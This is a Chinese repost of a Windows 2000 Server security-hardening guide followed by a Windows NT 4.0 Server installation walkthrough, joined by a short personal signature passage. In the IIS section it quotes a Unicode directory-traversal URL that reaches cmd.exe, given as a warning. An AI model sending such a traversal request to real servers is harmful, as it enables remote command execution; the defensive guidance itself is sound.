1．分区和逻辑盘的分配，有一些朋友为了省事，将硬盘仅仅分为一个逻辑盘，所有的软件都装在C驱上，这是很不好的，建议最少建立两个分区，一个系统分区，一个应用程序分区，这是因为，微软的IIS经常会有泄漏源码/溢出的漏洞，如果把系统和IIS放在同一个驱动器会导致系统文件的泄漏甚至入侵者远程获取ADMIN。推荐的安全配置是建立三个逻辑驱动器，第一个大于2G，用来装系统和重要的日志文件，第二个放IIS，第三个放FTP，这样无论IIS或FTP出了安全漏洞都不会直接影响到系统目录和系统文件。要知道，IIS和FTP是对外服务的，比较容易出问题。而把IIS和FTP分开主要是为了防止入侵者上传程序并从IIS中运行。（这个可能会导致程序开发人员和编辑的苦恼，管他呢，反正你是管理员）
2．安装顺序的选择：不要觉得：顺序有什么重要？只要安装好了，怎么装都可以的。错！win2000在安装中有几个顺序是一定要注意的： 首先，何时接入网络：Win2000在安装时有一个漏洞，在你输入Administrator密码后，系统就建立了ADMIN$的共享，但是并没有用你刚刚输入的密码来保护它，这种情况一直持续到你再次启动后，在此期间，任何人都可以通过ADMIN$进入你的机器；同时，只要安装一完成，各种服务就会自动运行，而这时的服务器是满身漏洞，非常容易进入的，因此，在完全安装并配置好win2000 SERVER之前，一定不要把主机接入网络。其次，补丁的安装：补丁的安装应该在所有应用程序安装完之后，因为补丁程序往往要替换/修改某些系统文件，如果先安装补丁再安装应用程序有可能导致补丁不能起到应有的效果，例如：IIS的HotFix就要求每次更改IIS的配置都需要安装（变不变态？）

三、 安全配置WIN2000 SERVER:
即使正确的安装了WIN2000 SERVER，系统还是有很多的漏洞，还需要进一步进行细致地配置。
1．端口：端口是计算机和外部网络相连的逻辑接口，也是计算机的第一道屏障，端口配置正确与否直接影响到主机的安全，一般来说，仅打开你需要使用的端口会比较安全，配置的方法是在网卡属性-TCP/IP-高级-选项-TCP/IP筛选中启用TCP/IP筛选，不过对于win2000的端口过滤来说，有一个不好的特性：只能规定开哪些端口，不能规定关闭哪些端口，这样对于需要开大量端口的用户就比较痛苦。

2．IIS：IIS是微软的组件中漏洞最多的一个，平均两三个月就要出一个漏洞，而微软的IIS默认安装又实在不敢恭维，所以IIS的配置是我们的重点，现在大家跟着我一起来： 首先，把C盘那个什么Inetpub目录彻底删掉，在D盘建一个Inetpub（要是你不放心用默认目录名也可以改一个名字，但是自己要记得）在IIS管理器中将主目录指向D:\Inetpub； 其次，那个IIS安装时默认的什么s cripts等虚拟目录一概删除（罪恶之源呀http://www.target.com/s cripts/..%c1%1c../winnt/system32/cmd.exe了？我们虽然已经把Inetpub从系统盘挪出来了，但是还是小心为上），如果你需要什么权限的目录可以自己慢慢建，需要什么权限开什么。（特别注意写权限和执行程序的权限，没有绝对的必要千万不要给）

3: 应用程序配置：在IIS管理器中删除必须之外的任何无用映射，必须指的是ASP, ASA和其他你确实需要用到的文件类型，例如你用到stml等（使用server side include），实际上90%的主机有了上面两个映射就够了，其余的映射几乎每个都有一个凄惨的故事：htw, htr, idq, ida……想知道这些故事？去查以前的漏洞列表吧。什么？找不到在哪里删？在IIS管理器中右击主机->属性->WWW服务 编辑->主目录 配置->应用程序映射，然后就开始一个个删吧（里面没有全选的，嘿嘿）。接着在刚刚那个窗口的应用程序调试书签内将脚本错误消息改为发送文本（除非你想ASP出错的时候用户知道你的程序/网络/数据库结构）错误文本写什么？随便你喜欢，自己看着办。点击确定退出时别忘了让虚拟站点继承你设定的属性。为了对付日益增多的cgi漏洞扫描器，还有一个小技巧可以参考，在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件，可以让目前绝大多数CGI漏洞扫描器失灵。其实原因很简单，大多数CGI扫描器在编写时为了方便，都是通过查看返回页面的HTTP代码来判断漏洞是否存在的，例如，著名的IDQ漏洞一般都是通过取1.idq来检验，如果返回HTTP200，就认为是有这个漏洞，反之如果返回HTTP404就认为没有，如果你通过URL将HTTP404出错信息重定向到HTTP404.htm文件，那么所有的扫描无论存不存在漏洞都会返回HTTP200，90%的CGI扫描器会认为你什么漏洞都有，结果反而掩盖了你真正的漏洞，让入侵者茫然无处下手（武侠小说中常说全身漏洞反而无懈可击，难道说的就是这个境界？）不过从个人角度来说，我还是认为扎扎实实做好安全设置比这样的小技巧重要的多。最后，为了保险起见，你可以使用IIS的备份功能，将刚刚的设定全部备份下来，这样就可以随时恢复IIS的安全配置。还有，如果你怕IIS负荷过高导致服务器满负荷死机，也可以在性能中打开CPU限制，例如将IIS的最大CPU使用率限制在70%。

4．账号安全： Win2000的账号安全是另一个重点，首先，Win2000的默认安装允许任何用户通过空用户得到系统所有账号/共享列表，这个本来是为了方便局域网用户共享文件的，但是一个远程用户也可以得到你的用户列表并使用暴力法破解用户密码。很多朋友都知道可以通过更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止139空连接，实际上win2000的本地安全策略（如果是域服务器就是在域服务器安全和域安全策略中）就有这样的选项RestrictAnonymous（匿名连接的额外限制），这个选项有三个值：
0：None. Rely on default permissions（无，取决于默认的权限）
1：Do not allow enumeration of SAM accounts and shares（不允许枚举SAM帐号和共享）
2：No access without explicit anonymous permissions（没有显式匿名权限就不允许访问）
0这个值是系统默认的，什么限制都没有，远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum等等，对服务器来说这样的设置非常危险。
1这个值是只允许非NULL用户存取SAM账号信息和共享信息。
2这个值是在win2000中才支持的，需要注意的是，如果你一旦使用了这个值，你的共享估计就全部完蛋了，所以我推荐你还是设为1比较好。 好了，入侵者现在没有办法拿到我们的用户列表，我们的账户安全了……慢着，至少还有一个账户是可以跑密码的，这就是系统内建的administrator，怎么办？我改改改，在计算机管理->用户账号中右击administrator然后改名，改成什么随便你，只要能记得就行了。不对不对，我都已经改了用户名了，怎么还是有人跑我管理员的密码？幸好我的密码够长，但是这也不是办法呀？嗯，那肯定是在本地或者Terminal Service的登录界面看到的，好吧，我们再来把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon项中的Don’t Display Last User Name串数据改成1，这样系统不会自动显示上次的登录用户名。将服务器注册表HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\ WindowsNT\CurrentVersion\Winlogon项中的Don‘t Display Last User Name串数据修改为1，隐藏上次登陆控制台的用户名。（哇，世界清静了）

5．安全日志：我遇到过这样的情况，一台主机被别人入侵了，系统管理员请我去追查凶手，我登录进去一看：安全日志是空的，倒，请记住：Win2000的默认安装是不开任何安全审核的！那么请你到本地安全策略->审核策略中打开相应的审核，推荐的审核是：
账户管理 成功 失败
登录事件 成功 失败
对象访问 失败
策略更改 成功 失败
特权使用 失败
系统事件 成功 失败
目录服务访问 失败
账户登录事件 成功 失败
审核项目少的缺点是万一你想看发现没有记录那就一点都没辙；审核项目太多不仅会占用系统资源而且会导致你根本没空去看，这样就失去了审核的意义。

与之相关的是：
在账户策略->密码策略中设定：
密码复杂性要求 启用
密码长度最小值 6位
强制密码历史 5次
最长存留期 30天
在账户策略->账户锁定策略中设定：
账户锁定 3次错误登录
锁定时间 20分钟
复位锁定计数 20分钟

同样，Terminal Service的安全日志默认也是不开的，我们可以在Terminal Service Configration（远程服务配置）-权限-高级中配置安全审核，一般来说只要记录登录、注销事件就可以了。
6.目录和文件权限： 为了控制好服务器上用户的权限，同时也为了预防以后可能的入侵和溢出，我们还必须非常小心地设置目录和文件的访问权限，NT的访问权限分为：读取、写入、读取及执行、修改、列目录、完全控制。在默认的情况下，大多数的文件夹对所有用户（Everyone这个组）是完全敞开的（Full Control），你需要根据应用的需要进行权限重设。
在进行权限控制时，请记住以下几个原则：
1>限是累计的：如果一个用户同时属于两个组，那么他就有了这两个组所允许的所有权限；
2>拒绝的权限要比允许的权限高（拒绝策略会先执行）如果一个用户属于一个被拒绝访问某个资源的组，那么不管其他的权限设置给他开放了多少权限，他也一定不能访问这个资源。所以请非常小心地使用拒绝，任何一个不当的拒绝都有可能造成系统无法正常运行；
3>文件权限比文件夹权限高（这个不用解释了吧？）
4>利用用户组来进行权限控制是一个成熟的系统管理员必须具有的优良习惯之一；
5>仅给用户真正需要的权限，权限的最小化原则是安全的重要保障；

7:预防DoS：
在注册表HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters中更改以下值可以帮助你防御一定强度的DoS攻击
SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0
NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0
KeepAliveTime REG_DWORD 300,000
PerformRouterDiscovery REG_DWORD 0
EnableICMPRedirects REG_DWORD 0

ICMP攻击：ICMP的风暴攻击和碎片攻击也是NT主机比较头疼的攻击方法，其实应付的方法也很简单，win2000自带一个Routing & Remote Access工具，这个工具初具路由器的雏形（微软真是的，什么都要做？听说最近又要做防火墙了）在这个工具中，我们可以轻易的定义输入输出包过滤器，例如，设定输入ICMP代码255丢弃就表示丢弃所有的外来ICMP报文（让你炸？我丢、丢、丢）

四、需要注意的一些事：
实际上，安全和应用在很多时候是矛盾的，因此，你需要在其中找到平衡点，毕竟服务器是给用户用而不是做OPEN HACK的，如果安全原则妨碍了系统应用，那么这个安全原则也不是一个好的原则。网络安全是一项系统工程，它不仅有空间的跨度，还有时间的跨度。很多朋友（包括部分系统管理员）认为进行了安全配置的主机就是安全的，其实这其中有个误区：我们只能说一台主机在一定的情况一定的时间上是安全的，随着网络结构的变化、新的漏洞的发现，管理员/用户的操作，主机的安全状况是随时随地变化着的，只有让安全意识和安全制度贯穿整个过程才能做到真正的安全。
本文在撰写过程中参阅了大量Win2000安全的文章，在此向这些作者表示感谢

----------------------------------------------
雨湿了我的头发，我用手轻轻拨弄了一下。
心情是那么的舒畅，在雨中我找回了真实的自己。漫步于雨中，是我最好的消遣寂寞方法。
我能想到最浪漫的事，就是和你一起慢慢变老。


安装NT Server服务器

《一键清理系统垃圾》

安装NT Server服务器

    在组建Intranet时，首先必须安装一台Windows NT Server服务器。安装过程十分简单，只需要按照屏幕的提示做就行了，值得注意的有：
    * 强烈建议在安装的时候把服务器硬盘格式化为NTFS,因为NTFS是专为Windows NT设计的，它具有许多新特性来保证可靠的存储和数据检索：支持热修补(hot fixing)，可以在运行中修复硬盘故障；支持基于目录和文件的权限和审核制;支持存储长度达到16EB字节的文件，运行效率要比FAT16高得多。
    * 在第一次安装NT Server时，不要立刻安装IIS(Internet Information Server)WEB服务，最好等到网络调通后再安装。
    建议使用NT默认目录，因为有不少软件是默认NT目录的。另外，也有一些行家说，NT要装在默认目录下才稳定些，具体如何，我就不知道了。同时，假如你的系统软件全部装在C盘的话，强烈建议你的C盘大于2G，本人测试服务器C盘为 1.2G，没过几天，剩余字节为0，停止好些服务，因为它每天都要写日志文件的，再加上NT要求的剩余空间也比较多。
    NT具体安装步骤:
    ①用DOS 6.X 的安装盘对硬盘进行格式化；
    ②用FORMAT/S对硬盘进行格式化，并安装上DOS ，这样当再装上WIN NT 后，就可以实现DOS、NT双重启动了；安装好CD-ROM驱动程序。
    ③插入WIN NT光盘（假设盘符为D），输入：
    D：\CD i386
    D：\CD i386>WINNT/B
此时，屏幕上出现NT安装画面；按提示进行安装。期间会要求重新启动计算机。
    ④当提示计算机的列表的配置内容相符时，选择“不更改”；当出现磁盘分区的选择时，选择C盘（也可以重新分区，但是以前的分区就没有了。）；安装目录用默认的c:\winnt；
    ⑤取出A盘和CD-ROM，重新启动计算机。
    ⑥输入用户名和组织名；输入CD KEY ；选择“每客户”方式；输入计算机名称；
    ⑦其余按照提示安装就行了。

Windows NT 4.0的安装

    无论采用哪一种Windows NT 4.0安装方式，在安装过程中，均要由用户输入一些翻译片和进行一些设置，为此，在安装前有必要熟悉它们。
Windows NT 4.0安装的三个过程（理论，可跳过不看）：
    采用winnt/b命令安装时，要经历三个过程。
⑴首先将安装所需的文件，从安装光盘拷贝到硬盘的临时目录内，这个过程不用用户参与。
⑵当拷贝完成后,要求按ENTER键重新启动计算机,这时安装程序将检测计算机存贮设备和其它一些硬件和软件组件,并要求对有些提问进行确认,主要有:

同意遵守Windows NT用户使用许可协议，才能继续进行安装。这个协议是微软公司为Windows NT 4.0的使用权对用户制定的协议，使用者要购买相应协议，这主要为了该公司的商业利益。
将Windows 95 安装在那种格式的硬盘分区上，是FAT还是NTFS格式，当想保留原DOS或Windows 95的应用程序，合系统具有双重启动功能，即根据系统工程开机后的提示，可选择系统是用DOS（或Windows 95）启动，还是用Windows NT 进行启动，则可选用FAT格式，但若要作为专一服务器使用，发挥Windows NT 的强有力功能，尤其是提高网络的安全性时，可选用NTFS格式。
要求用户指明将Windows NT安装在什么目录下，一般可采用缺省路径，即安装在硬盘的\winnt子目录下。
最后要求用户选择，是否要对硬盘再进行一次更安全地检查，可以选择进行检查，这将耗费几分钏的时间，但它却能保证以后安装的安全检查可靠。
    接着将进行部分Windows NT的安装，当这部分完成后，要求重新启动计算机，于是进入第三过程将由Windows NT的安装。
⑶该过程将由Windows NT“安装向导”指导最后一个过程 的安装，该过程将出现各种画面和对话框，以引导用户输入相应内容以完成三个步骤的工作，这三个步骤是：
——收集计算机信息。
——安装Windows NT网络。
——完成安装。
在该过程的安装中，由Windows NT安装向导指导安装，将主要要求用户输入如下的一些信息：

用户名和所在组织。用户保指该系统用户者的名字，如可以是安装者或其它人的名字，甚至可以是一个标记名，输入用户名后，安装向导才继续进行下一步的安装；
选择安装方式，如前所述，有四种安装方式，即：
典型安装：这是一种快速、标准的安装方式，一般安装者可选这种方式。
便携式安装：这是一种在笔记本计算机上安装的方式。
简单安装：将由用户选择安装一些网络组件，这种安装，它将少安装一些网络组件。
定制安装：将由用户选择安装一些网络组件，这种安装适合于对Windows NT较为熟悉的用户。

择许可协议方式
这是美国本土内使用软件产品必须要遵守的协议，若违反该协议，被查出，将要处以巨额罚款。 所谓许可协议，就是指许可用户使用Windows NT的权利，许可协议方式有两种：每服务器方式、每客户方式
“每服务器方式”是指与该服务器连接的每个客户均要购买“客户访问许可协议”，而且与该服务器连接的客户数有数量限制，即一个服务器可以带多少个持有访问该服务器许可协议的客户。
“每客户方式”是指客户访问Windows NT网中的服务器，均要持有“独立的客户访问许可协议”，它可访问网中的任一服务器。而不像每服务器方式，只允许客户访问许可协议“数，要大于每客户方式中总的“客户访问协议”数目，为节约费用，可选用每客户方式。 一般情况下，如小型网可选每服务器方式，但要求填入要连接的客户数。

输入计算机名，这是为了标识该计算机而起的名字，在网络中，客户要访问该计算机，便要用该名字来指明，该名必须是唯一的，不能和网上其它计算机重名，也不肥和域名相重。
要确定安装Windows NT的该台计算机是用作主域控制器、备份域控制器还是一般服务器当要以工作组方式组网时，可设置为一般服务器，若是网中的第一台服务器（当以域方式组网时），可设置为主域控制器。
输入系统管理员（Admiuistratrator）设置密码，这个系统管理员有最大权限来管理网络，它的名字也可进行改名。
要求回答是否制作一张紧急修复盘，一般应选择制作，这样一旦日后当Windows NT系统文件遭到破坏，不能启动时，用启动盘和该修复盘可修复被损坏的系统文件。该修复盘保存了该系统当前的设置，若以后一旦该系统硬件设置进行了改变，该修复盘便失效。
选择网络连接方式，可有两种选择，即：用线路连接网络、远程访问网络。 因一般用网卡通过线路连接成网，故选前项，当通过调制解调器连网时，可选后者，若既通过网卡连网，又通过调制解调器联入，进行远程访问，可选两者。
若要连入Internet网，则要安装Internet Information Server。这个安装也可在安装完Windows NT后进行，如可在Windows NT的控制面板中的网络选项中进行。
检测与选择网卡，并安装网卡驱动程序。
选择网络协议，可选择的有：
TCP /IP
Nwlink IPX/SPX
NETBEUI
当组成一个效率高的小型网时，可选NETBEUI，当要连入Internet网时，可选TCP/IP，当要和Netware 网相连时，可选Nwlink IPX/SPX 。

当选定该服务器为主域控制器时，要求输入域名，缺少域名为“ＤＯＭＡＩＮ”，用户也可为其改名。当选定该服务器为备份域控制器时，要求输入要登录的域名；当选定该服务器为一般服务器时，要求输入工作组名。
Windows NT4.0的具体安装步骤（刚才说跳过的，跳到这里就要看了！）

       1.第一过程的安装

    ⑴用DOS6.X的安装盘对硬盘进行分区，即调用Fdisk命令，若该机既作为服务器又可作为PC机使用时，可将硬盘分成两个区，否则可分为一个区（当然硬盘容量要大，如2.1G以上）。
    ⑵用FORMAT/S命令对分区格式化，并安装上DOS。这样当再安装上Windows NT后，Windows NT就会出现在DOS的文件分配表(FAT )中,因而当该台计算机启动时,便具有双重启动功能,是从DOS启动还是从Windows NT启动，可进行选择。
    ⑶安装CD-ROM驱动程序，使得CD-ROM,以便进行安。购买光盘驱动器时，均带有相应的驱动程序盘，有在DOS下安装的，有在Windows NT下安装的，一般可用install命令进行DOS下的安装。
    ⑷插入Windows NT Server 4.0安装光盘在CD-ROM驱动中,假设光盘符为D :使当前盘符为D:并在光盘的i386子目录下,即
         D:\i386↙
         D:\i386＞
    ⑸调用光盘中的winnt.exe程序进行安装，即输入：
         D :\i386＞winnt/b↙
    ⑹此时屏上出现Windows NT Server 4.0的Setup画面，并出现要求输入安装程序的源路径，可采用屏上给出的源路径名：（ D：\i386）当按ENTER键后,屏上出现请等待的提示,此时在屏的右下方白条栏内动态地显示着拷贝文件的过程,并用黄条的增长实时显示文件拷贝到硬盘的百分比.这个过程 将用较长的时间。
    ⑺当拷贝完成后，屏上会出现提示，说明基于DOS的部分已经安装完成，要求重新启动计算机，继续进行下一步Windows NT 的安装。
这时可重新 启动计算机（若A盘中有盘时，请取出）（即按ENTER键），进行第二个过程的安装。

2．第二个过程的安装

    当计算机重新启动后，稍待片刻，屏上便出现了“Windows NT Server安装程序”的画面，可选择“开始安装Windows NT”选项，并按ENTER键，于是安装开始，其步骤如下：
    ⑴这时，安装程序将检测计算机的存贮设备，如硬盘的IDE接口、SCSI卡、CD-ROM等，并将检测结果显示在屏幕上，可按ENTER键继续。当计算机中的有关存贮设备的驱动程序在Windows NT中没有，而是由厂家提供时，可采用手工设置的方法，按S键。当若采用由安装程序自动检测，可能由于某些不知原因将导致死机时，也可选用手工设置，而不作自动检测。
    ⑵接着屏幕上出现Windows NT许可协议，此时，可按Page Down键，一页页将其阅读完，当到最后页时，可按Ｆ８键，表示同意该协议，于是可继续开始安装。
    ⑶接着安装程序将检测计算机的硬件和软件组件，并在屏上显示检测结果，当屏上的列表内容与安装的计算机配置相符时，选择“不更改”，可按ENTER键继续，否则将光标移至错误项，按ENTER键，进行修改。
    ⑷这时，屏幕上会出现安装Windows NT到磁盘分区的选择，选取在C盘上安装，再按ENTER键继续，也可作删除分区的操作。
    ⑸接着在屏上出现安装Windows NT在磁盘 分区上，并要求选择采用FAT还是NTFS文件系统，用户可根据自己的需要进行选择（一般选NTFS）。
    ⑹当选择了FAT或NTFS文件系统并按ENTER键后，屏上将会出现将Windows NT安装在什么子目录下的选择提示，可选内定目录，即： C：\wimmt 并按ENTER键即可。
    ⑦接着出现安装程序将对硬盘进行一次更安全地检测提示，若允许检测，可按ENTER键，否则可按ESC跳过此检测，一般可选检测，屏上将出现要花费几分钟检查时间，请等待信息。
    ⑻等待结束后，安装程序开始继续安装复制文件的进度以百分比的黄亮条实时地显示。
    ⑼当安装完成后，屏上出现“已完成这部分的安装”信息，要求取出A盘（若装有软盘时）和CD-ROM盘，重新启动计算机。

当按ENTER键后，计算机便重新启动，于是开始最后一部分的安装。

3．第三个过程的安装

    当计算机启动后，就开始了最后的安装，稍后便在屏幕上出现Windows NT安装程序的标志，画面中显示欢迎进入Windows NT安装向导，它将指导您进一步完成Windows NT的下一部分安装，此时已可使用鼠标器，因而后面的安装可用鼠标和键盘进行。

    下面的安装要完成三全步骤，即：
——收集有关计算机的信息
——安装Windows NT网络
——完成安装

    该过程进行步骤如下：
     （１） 当用鼠标按“下一步”按钮后，屏上出现安装方式选择画面，可有典型安装、便携安装、简单安装和定制安装，一般可选典型安装，接着按“下一步”按钮。
    （２）在出现的名称和组织画面上，输入用户名称和组织名，并按“下一步”按钮。注意：必须输入 名称，安装才能往下继续进行。
     （３）在出现的注册画面上，输入 10位数字的CD码到CD码框中，CD码（Key）实际上是正版Windows NT Server的光盘背面的黄面的黄色贴纸上，或者装盘的纸带上。接着按“下一步”按钮。
    （４）这时出现许可协议方式画面，所谓许可协议就是许可客户使用Windows NT的权利，许可协议方式有两种：每服务器方式、每客户方式。可任选一种，当选“每服务器方式”时，还要在客户数框内填入要连接的客户数。按“下一步”按钮。
    （５）在接着出现的计算机名称输入框中，输入该 计算机的名称，名字最长可达１５个字符，该名称将用来标识该计算机，因而它必须是唯一的，不能与别的计算机名、域名、工作组名重名。接着按“下一步”按钮。
    （6）在出现的服务器类型画面上可定义该服务器上一个主域控制器还是备份域控制器，或者是一个独立的服务器。本例为要组成一个域结构的网且是第一个安装，故可选择为主域控制器，并按“下一步”按钮。
    （7）在职接着出现的管理员帐号的密码输入一栏内，填入密码，并在确认密码栏内也填入同样的密码 ，以示确认。 由于选定安装的服务器为主域控制器，因而Windows NT服务器中的系统管理员称为“administraior”，它拥有最高权限，可管理服务资源与用户帐号。 当确认了管理员密码后，可按“下一步按钮”，管理员名称也可由用户改变。
    （8）此时屏幕上将出现是否在安装过程中创建紧急修复盘中将存放修复Windows NT服务器所需要的数据，当Windows NT服务器中系统文件被损坏作这张盘，为此可选“是”，并按“下一步”按键。（修复盘制作将在稍后进行）。
    （9）接着出现Windows NT组件选择安装画面。这些组件有：
Windows Messaging
安装其它输入法
多媒体
辅助选项
附件
通信
游戏
    组件前带阴影的方框，表示只安装了该组件的部分软件，不带阴影的方框，表示没安装该 组件，可单击“详细资料”按钮，以得出该组件包含的各软件。
    可以自己选择要安装的组件，也可不作选择（即按缺省安装），当选择后，可按“下一步”按钮。
    （10）组件选择完后，至此表示第一步收集有关计算机住处已完成，接着将进行第二步，即Windows NT网络的安装，在出现的安装程序画面上，按“下一步”按钮，以继续进行安装。
    （11）此时，屏幕上出现计算机与网络连接方式选择画面，可有两种选择：
    用线路连接网络
    远程访问网络
    因用户一般均用网卡通过线路组网，因而可选项，但当通过调制调器连网，如联入Internet网时，必须选择“远程访问网络”选项，当通过线路连接局域网，又通过调制解调器时（如Internet），可同时选两者。 当安装的不是域控制器时，这时画面上将出现询问是否要连接到Windows NT网上。
    （12）接着屏上出现“Microsoft Internet Information Server允许您本身的Internet或Internet从该服务器上共享信息”，并Microsoft Internet Information Server 的选择框，意思是若安装上Microsoft Internet Information Server ，本服务器可访问Internet，当然Internet也可访问本服务器（这只是软件上得到支持，要真正连上Internet，还得有硬件的支持）。 Microsoft Internet Information 的服务功能有Web 、 Gopher 、 FTP等。当选择了安装该软件后，该服务功能就集成到了Windows NT服务器上了，若要和Internet连网可选择它，即按“下一步”按钮。该软件的安装将在稍后进行。建议先不要安装该软件，当网络连接成功后，若要和Internet连网时再安装。
    （13）这时，“安装程序向导”将询问是否由安装程序自动开始搜索网卡，或者由用户选择网卡。当选择“开始探索”网卡时，安装程序将检测插入该服务器中的网卡，若搜索到，还会列出该网卡的驱动程序并进行安装，一般网卡都会检测到，除非特殊的网卡。若有第二块网卡，则会出现“查找下一个”按钮，否则按“下一步”按钮。 选自动检测网卡，可按“开始搜索”按钮。
    （14）当搜索到网络适配器对应的型号时，将会显示在网络适配器中进行安装。 若服务器中还插有另一个网络适配器，可单击“查找下一个”按钮，否则按“下一步”按钮。
    （15）这时屏幕上出现选定网络协议的选择框，可选的网络协议有： TCP/IP Nwlink IPX/SPX NETBEUI 因要组建一个小型网络，故可选NETBEUI，并按“下一步”按钮。若已选择安装了Microsoft Internet Information，便必须要选择TCP/IP协议。
    （16）当出现准备安装选定的和其它系统所需的网络组件画面时，可进行选择安装。当接收缺省安装时，可按“下一步”按钮，若要增加其它的网络服务，可按“从列表中选择”按钮。选择完后，再按“下一步”按钮。
    （17）当出现安装Novell NE2000兼容网卡的画面时（假设在（13）步骤中，已检测到安装了Novell NE2000网卡，因而出现了安装该网卡操作），可采用画面中相应框中给出的数据，如中断号为3、I/O口X300，若这些值与别的卡设置冲突，可改变它，因Windows NT没有即插即用功能，因而这些值必须人工设置。当网卡硬件设置和安装时确定的值不符时，可完成安装后，再改变网卡的硬件设置（如用跳接插头、软件进行设置等）。
    （18）当按“继续”按钮后，若安装了TCP/IP，屏上出现网络上是否存在DHCP服务器的询问，DHCP是指动态的主机配置协议（Dynamic Host Configuration Protocol）,一旦网中存在有DHCP服务器时，每当一个网中计算机启动入网时，DHCP服务器便动态地给它分配一个IP地址（关于这方面的内容可参阅第十五章TCFP/IP协议中有关内容）。 因此，当安装了TCP/IP，屏上出现网络上是否存在DHCP服务器的询问，DHCP是指动态的主机配置协议（Dynamic Host Configuration Protocol）,一旦网中询问存在DHCP是服务器时，每当一个网中计算机启动入网时，DHCP服务器便给它分配一个IP地址（关于这方面的内容可参阅第十五章TCP/IP协议中有关内容）。 因此，当安装了TCP/IP协议，且用户所在网络上有DHCP服务器时，可选用DHCP功能，由它日后动态地为该服务器分配IP地址若不选用DHCP功能（即接“否”按钮），则当出现“Microsoft TCP/IP属性“画面时，可输入本计算机相应的IP地址（如220、113、16、210）与子网掩码（255、255、255、0），然后按“确定”按钮；（TCP/IP属性的设置，也可在Windows NT安装后进行，如可调用Windows NT控制面板中的网络图标进行设置）。
    （19）接着开始安装选定的网络组件。当出现显示绑定和查找网络住处的顺序对话框时，在“显示绑定属于”框内，有“所有服务”、“所有协议”、“所有适配器”选项，当选定某一项时，便在大框图内引出了该项的顺序内容，可不进行选择，即按缺省方式进行。这样当用户从工作站登录，与服务器进行通信时，Windows NT Servre 将按缺省排列的通信协议顺序进行网络通信如先用TCP/IP，若采用NETBEUI等。当用户网络中多数工作丫采用TCP/IP协议进行通信可将TCP/IP放在顺序前面，若采用NETBEUI用户居多，则可将它放在顺序前面。 当选定后，可按“下一步“按钮。
    （20）这时屏上出现Windows NT准备启动网络以完成网络安装，可单击“下一步”按钮以启动网络。
    （21）当屏上出现要求提供主域控制器名时，可输入域名或采用内定的DOMAIN域名，因为安装的服务器在前面的步骤中已选定为主域控制器，故要求输入域名。（如我们可选用内定的DOMAIN域名） 当安装的是备份域控制器时，则应输入要加入的域名，并要输入系统管理员名和密码。 当安装的是一般服务器时，则应输入工作组名，若这个一般服务器要加入到一个域中时，则应输入加入的域名，并要输入系统管理员名和密码。 当输入域名后，按“下一步”按钮，这时出现安装完成的画面，这样，第二步“安装Windows NT网络”便宣告完成，可进行第三步“完成安装”，单击“完成”按钮。
    （22）屏上出现正在配置您的计算机画面，在出现Microsoft Internet Information Server2.0安装画面时，可进行选项安装，如可选Internet Service manager 、 World Wide Web Service、 FTP Service。当在（12）步骤中不选择安装Microsoft Internet Information Server这一项，便不会出现该画面。
    （23）选择完后屏上出现C:\SWMNT\System 32\Inetsrv目录不存在，要是否创建它的询问框，可选“是”。
    （24）在接着出现的发行目录框中，对各发行目录进行“确定”，并按钮。当出现要创建这些目录的询问框时，哥选“是”。
    （25）这时便开始了Microsoft Internet Information Server2.0的安装。
    （26）当屏上出现时间日期和属性画面时，可进行设置，当完成后可按“关闭”按钮。
    （27）接着出现显示器属性画面，Windows NT Server自动检测显示适配器的种类，允许用户对显示的颜色数、字形大小等属性参数进行选择，当选好后可按“测试”按钮，将对显示进行测试，若测试正确，可按“确定”否则重新进行设置安装。
    （28）沁完成显示器测试，并按“确定”按钮后，便又开始复制文件、保存系统共青团。完成后要求放置到驱动器中进行紧急修复盘的制作，（当然若安装开始时，没有选取要制作紧急修复盘，则没这一步）。完成后，可取出软盘重新启动，至此Windows NT Server 便安装完成了。
    （29）当重新启动计算机后，便出现了选择操作系统的画面（以后每次启动该计算机时，均出现同样的画面），可选择用Windows NT Server Version4.0启动，即以自己设置的显示属性模式启动，若由于设置错而无法正常启动时，可选第二项，即以Windows NT Server 4。00[VGAMode]进行启动，这时启动将采用标准的VGA显示模式。（640×480分辨率和16色）。 由于本服务器安装时，已安装了DOS，采用FAT文件格式，故出现了MSDOS选项，因而具有双重启动选择功能，当要选择用DOS启动时，可选第三项，即用DOS启动，而不用途服务器。
    （30）当每次Windows NT Server 启动时，便会出现开始登录画面上输入系统管理员名称及密码进行登画面上输入系统管理员名称及密码进行登录当系统检查核对后，若正确，则在屏上便出现了Windows NT Server4.0的画面，至此说明安装成功。

    如果你还要在这台服务器上安装DNS（域名）服务、WINS（Windows Internet名称）服务和DHCP（动态主机配置协议）服务，你还需要把DNS服务器和WINS服务器的IP地址都设为192.168.0.1。安装DNS服务的目的在于使网络主机的名称（如: company.com.cn）和它的IP地址（192.168.0.1）相对应，WINS则能使服务器自动管理网络中的计算机名称和它们IP地址的对应关系，这样可以大大减轻管理员的负担。要想建立Intranet，WINS和DNS都应该安装。

添加协议：
    首先，必须确保服务器的网卡已经安装好。在服务器的"控制面板"里，双击"网络"图标以后，添加微软公司的TCP／IP协议，并进行适当的设置。
下面以我们上一节的假设为例（即：IP为192.168.0.1、网关为192.168.0.0掩码为255.255.255.0）为例，具体操作步骤如下：
    a.双击"我的电脑"→双击"控制面板"→双击"网络"图标→配置→看“已经安装了下列网络组件”里面有果没有列出“TCP／IP→ D-Link DE2200 ISA PnP LAN adapter”其中，划线部分为你的网卡的名称，如有，则不用添加，否则，按下列步骤进行：单击“添加”项 → 在“请选择网络组件类型”窗口的“请选择要安装的网络组件”里面的“协议” → 添加 → 出现“选择网络协议”窗口 → 在“厂商”栏里选择“Microsoft”，在“网络协议”栏里选择“TCP/IP” → 确定→可能会要求插入NT 4.0光盘→开始安装。添加完后应该在协议里出现“TCP/IP通信协议”。
